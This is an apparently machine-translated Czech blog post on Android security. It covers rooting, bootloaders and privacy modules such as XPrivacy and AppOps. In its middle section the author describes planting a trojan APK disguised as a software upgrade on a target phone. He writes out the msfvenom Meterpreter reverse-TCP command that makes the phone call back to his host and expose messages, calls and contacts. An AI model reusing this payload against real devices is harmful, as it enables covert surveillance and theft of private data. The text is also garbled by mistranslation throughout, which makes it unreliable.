Zdroj obrázku: pixabay.com
Úvod do Androidu
V tomto tématu se budeme učit o Androidu a Open Source Security (OS). Android je platforma Open Source. Je to podobně jako Linux, ale stále se příliš liší od Linuxu. Linux je ve srovnání s Androidem příliš vyzrálý. Tohle je Chetan Nayak a vítejte na mém dalším blogu o Open Source Web Security. Tento blog jsem napsal za předpokladu, že většina z nás bude používat Android K, tj. Kitkat nebo Android L, tj. Lollipop.
Důvodem je, že Gingerbread a Jellybean měli spoustu problémů s otevřeným zdrojovým kódem, o nichž v tomto jediném blogu nemohu diskutovat. Možná to budu diskutovat příště, až se dostanu hlouběji do starších verzí Androidu. Takže od nynějška se držme u KitKat a Lollipopu.
Android byl navržen s ohledem na vývojáře. Bezpečnostní kontroly byly navrženy tak, aby snižovaly zátěž vývojářů. Vývojáři se spolehlivým zabezpečením mohou snadno spolupracovat a spolehnout se na flexibilní bezpečnostní kontroly. Vývojáři méně obeznámení s bezpečností budou chráněni bezpečnými výchozími hodnotami.
Začátek
Až do pozdějšího čtvrtletí roku 2013, kdy jsem měl svůj první mobilní telefon s Androidem, který byl Sony Xperia L (podle té doby 4.2.2), jsem toho moc nebyl. Heck, dokonce jsem nenáviděl android z toho důvodu, že to bylo velmi laggy, zejména Samsung zařízení. V té době jsem dokonce uvažoval o koupi Windows Lumia, ale naštěstí jsem hrával spoustu her a musel jsem si koupit Xperia L, protože tato buňka byla Lag Proof. Měl asi 1 koncert RAM a Adreno 305. Dost dobře na to, aby běžel cokoli.
Poté, co jsem hrál spoustu her jako NOVA3 a ModernCombat4, jsem se z té buňky do měsíce nudil. Věděl jsem, že Android je založen na Linuxu, a chtěl jsem na tom provést některé z mých úprav. Začal jsem číst o přizpůsobeních a dozvěděl jsem se o tom, čemu se říká Rooting. Vzhledem k tomu, že jsem měl dobrý backhand v Linuxu, zakořenění nebylo problém se mnou. S trochou pomoci od XDA jsem byl schopen úspěšně zakořenit svoji buňku.
Ale pak mě něco zasáhlo. Jakmile se moje buňka po zakořenění restartovala, právě začala spouštěcí smyčku (navždy přilepená na spouštěcí obrazovce). Ani jsem nevěděl, co je bootloader v androidu. Takže jsem nemohl nic udělat. Bylo to jen měsíc, co jsem koupil svou novou buňku a moje buňka byla nyní měkká. Vždy jsem četl zakořenění je nebezpečné, ale nevěděl jsem, že by to zničilo mou celu. Ale mýlil jsem se. Jak jsem neustále četl jednu a všechny ostatní věci o zakořenění, zjistil jsem, že zakořenění váš telefon nezklame.
Kořenování je podobné a přístup správce v počítači (ve skutečnosti je to přístup do systému, ale napsal jsem přístup správce, takže je snadno pochopitelné pro nooby.). To znamená, že zakořenění nikdy nezklame váš telefon. Byl to bootloader, který zdělal můj telefon. Pro lidi, kteří neznají bootloader je; bootloader je podobný systému BIOS v systému Windows. (Pokud nevíte, co je BIOS, pak byste si vůbec neměli číst přemýšlení o bezpečnosti na prvním místě.) Bootloader nebo Hboot (to je to, co se nazývá v systému Android) je první věc, která se spustí při spuštění systému Android. přístroj.
Balí pokyny pro spouštění jádra operačního systému a většina z nich je navržena speciálně pro spuštění vlastního ladicího nebo modifikačního prostředí.
CheckPoint zabezpečení systému Android
Zaváděcí program považujte za kontrolní bod zabezpečení vašeho zařízení. Pokud tento kontrolní bod porušíte, ztratíte všechno, co máte na telefonu. Takže to je dobrá bezpečnostní funkce, kterou říkám. Protože pokud ztratíte telefon a někdo se pokusí získat root přístup k obejití zámku (za předpokladu, že jste zařízení zamkli špendlíkem nebo heslem.), Musí povinně odemknout bootloader, což povede k vymazání vašich dat na telefonu.
Takže se nemusíte starat o někoho, kdo by ho zneužil. Podobně je tomu u vlastních ROM. ROMy jsou operační systémy založené na verzích Androidu speciálně navržených pro vaši hardwarovou architekturu. Pokud tedy pro svůj telefon zkontrolujete XDA, budete mít pro svůj telefon n počet přizpůsobených ROMů, z nichž nejznámější jsou Cyanogen Mod ROM, které jsou již předem zakořeněné a přicházejí s předem definovanou sadou přizpůsobení .
Zabezpečení OverRide systému Android
Od teď si možná myslíte, že máte zabezpečený mobilní telefon. Ale jsem tu, abych vám znovu dokázal, že se mýlíte, a to je celý smysl tohoto blogu. Ve druhém čtvrtletí roku 2014 lidé již začali vyvíjet exploity a rootkity pro Android, které by mohly rootovat vaše mobilní telefony bez nutnosti odemykání bootloaderů.
Není dost děsivé? Dovolte mi, abych vám řekl nejnebezpečnější část. Mohli by do něj nainstalovat také trojské koně. Takže i kdyby policajti mohli vysledovat buňku a vy jste dokonce dostali svoji buňku zpět, stále existuje vysoké riziko, že uvidí všechno, co na svém telefonu vidíte. To je něco, co jsem vyzkoušel jako experiment v reálném praktickém prostředí.
Pro tento útok jsem použil Metasploit. To, co jsem udělal, bylo, že jsem vytvořil trojského koně a nainstaloval ho do cílového telefonu. Byl to jednoduchý soubor apk a pojmenoval jsem jej jako upgrade softwaru. Pokud je tedy uživatel obyčejným mužem s pouze bitem a bajtem informací o zabezpečení, pak se ho ani neodváží odstranit. A ujistil jsem se, že pokaždé, když je internet aktivován, malware, který jsem vytvořil, se automaticky spustí a připojí zpět k mému vzdálenému portu na hostitelském počítači.
K útoku byly použity následující příkazy (Metasploit je software pro testování penetrace, který pomáhá při kontrole zranitelností na platformě nebo na konkrétních zařízeních.)
Adresa IP hostitele: 192.168.xx.xx
Port mého hostitele (pro připojení zpět): 445
>>>msfvenom
>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk
Tady jsem v počítači vytvořil reverzní kanál TCP. Takže pokaždé, když se na Androidu spustí internet, dostanu na svém stroji Kali nebo na stroji, kde jsem nainstaloval Metasploit, otevřenou schránku.
Teď už víte, jak děsivé je to pro osobu, kterou ani nevíte, má záznamy o všech transakcích, které provádíte prostřednictvím vaší buňky, o každém dalším kontaktu, zprávách WhatsApp, SMS, Viber a Skype a také o voláních. Pokud to není děsivé, pak nevím, co to je.
Doporučené kurzy
- Certifikační kurz v ladění Ruby
- Kompletní PHP MySQL kurz
- Online certifikační kurz v programování VB.NET
- Online kurz o nadaci ITIL
Pokrytí
Dost o problémech se zabezpečením. Všichni víme, že každá další platforma má problémy se zabezpečením. Jak bychom tedy mohli být v bezpečí? To není úplně pravda. Platformy mohou být zabezpečeny až do určitého bodu, ale poté je na nás, abychom se ujistili, že to tak zůstane. Ve světě bezpečnosti je neslavný citát:
"Sociální inženýrství: Protože neexistuje žádná záplata pro lidskou hloupost."
Slyšel jsem tuto větu už dávno, když jsem sledoval konferenci DefCon.
Pokud neexistuje technická zranitelnost k zneužití, měli byste se pokusit hacknout lidi. A tím nemyslím hypnotismus a tak. Myslím sociální inženýrství. Další informace o tomto tématu naleznete v mém dalším blogu „Důležitost kybernetické bezpečnosti v našem každodenním životě“.
Základní funkce zabezpečení systému Android
Kromě toho, sociální inženýrství, což je něco, o co se lze postarat, pouze pokud jste inteligentní; existují způsoby, jak můžete vyvíjet aplikace pro Android bezpečným způsobem, abyste se ujistili, že to tak zůstane.
Zde jsou některé základní funkce zabezpečení, které vám pomohou vytvářet bezpečné aplikace:
- Karta aplikace Android, která izoluje data aplikací a provádění kódu od jiných aplikací.
- Aplikační rámec s robustními implementacemi běžných bezpečnostních funkcí, jako je kryptografie, oprávnění a zabezpečené IPC.
- Šifrovaný souborový systém, který lze aktivovat pro ochranu dat na ztracených nebo odcizených zařízeních.
- Oprávnění udělená uživateli k omezení přístupu k funkcím systému a uživatelským datům.
- Oprávnění definovaná aplikací pro řízení dat aplikace na základě aplikace.
Co můžete dělat, pokud chcete zabezpečené prostředí, ale nejste vývojář?
Od systému Android 5, tj. Lollipop, nabízí funkci, ve které může uživatel přidat více profilů a režimů s omezeným přístupem k používání telefonů a tabletů. Kromě toho, pokud jste zakořenili telefon, existují v aplikacích pro Android v aplikacích Xposed, jako jsou AppOps, Xprivacy nebo Privacy Guard, které vám pomohou postarat se o téměř všechno. K tomu musíte nainstalovat Xposed Framework.
Xposed Framework je to, co umožňuje práci modulů Xposed. Moduly Xposed umožňují změnit chování souborů Apk a systémových souborů bez nutnosti instalace jiné paměti ROM. Je také snadné vrátit změny zpět, takže zde není nic rizika a není to ani časově náročné, protože není třeba blikat více ROMů, jader a jejich oprav chyb.
Xprivacy, Privacy Guard a AppOps jsou exponované moduly, které vám umožní zabezpečit váš Android zabezpečením výběrem, která aplikace by měla mít přístup k tomu, jako je internet, klávesnice, sdcard, root root a spousta dalších věcí. Můžete dokonce zakázat přístup pouze ke konkrétním službám a vytvořit pro to uživatelské šablony. Pokud jde o mě, raději volím Xprivacy. Ale zde jsou některé informace nebo rozdíly, pokud se chcete prosit, aby jste si vybrali mezi výše uvedenými třemi.
AppOps:
Toto bylo původně představeno společností Google v systému Android 4.3. (Toto je hlavní důvod, proč ho nepodporuji. Google nedůvěřuji. Nazvěte to Paranoia, ale Google sleduje vše, co děláte. A nepotřebuji někoho, aby sledoval vše, co dělám, ale pokud Google důvěřujete, Google, jít na to.). Hlavním omezením aplikace AppOps je to, že Google vám umožňuje blokovat přístup pouze k aplikacím, které chcete blokovat.
To znamená, že pokud chcete zablokovat aplikace související se společností Google, jako jsou například služby Play (které skutečně spotřebovávají více než 50% vaší běžné paměti, baterie a data (internet)), nebudete moci. To je další důvod, proč jsem Google nenáviděl. Takže věřím, že AppOps pro mě není nic jiného než malware. (ale myslím, že to tak já jen myslím, že tomu tak není, pokud společnosti Google důvěřujete pouze srdečně)
Ochrana osobních údajů:
Privacy Guard je jednoduché uživatelské rozhraní vytvořené jako náhrada za AppOps společností Cyanogen Mod. Pokud jste začátečník, navrhuji, abyste to používali, protože má pouze přepínací tlačítko on-off a samo-definované šablony, ke kterému druhu aplikace by měl mít přístup. Není to tak bezpečné, pokud existuje malware, který působí nebo se vydává za systémovou aplikaci. Ale je dobré začít.
Xprivacy:
Xprivacy je nástroj Vše v jednom. Je však určen odborníkům. Můžete to porovnat s nožem Swiss Army. Má v sobě všechno a váš telefon může zabezpečit úplně jiným způsobem, ale pokud nevíte, co děláte, váš telefon jen zkazí a zastaví aplikace, a to dokonce i od začátku. Můžete také omezit přístup k systémovým aplikacím. Toto je to, co já osobně preferuji.
Kromě výše uvedených modulů existují v Xposed i další moduly, jako je Lightening Firewall nebo BootManager, které mohou pomoci omezit přístup na internet pro konkrétní aplikace a zabránit restartování aplikací při restartování telefonu vedle systému.
Takže to by bylo pro tento blog. V případě bezpečnostních problémů můžete určitě navštívit nebo být členem webu XDA, který vám může poskytnout mnohem více informací o ochraně osobních údajů.
Doporučené články: -
Toto byl průvodce Androidem. Zde jsme diskutovali základní koncept, kontrolní body zabezpečení a základní bezpečnostní funkci systému Android. Další informace naleznete také v dalších navrhovaných článcích -
- Dotazy na rozhovor s Androidem - 10 nejlepších užitečných otázek
- 8 užitečných alternativ Siri pro Android
- 28 nejlepších tipů a triků pro vývojové nástroje pro aplikace pro Android
- Kariéra ve vývoji Androidu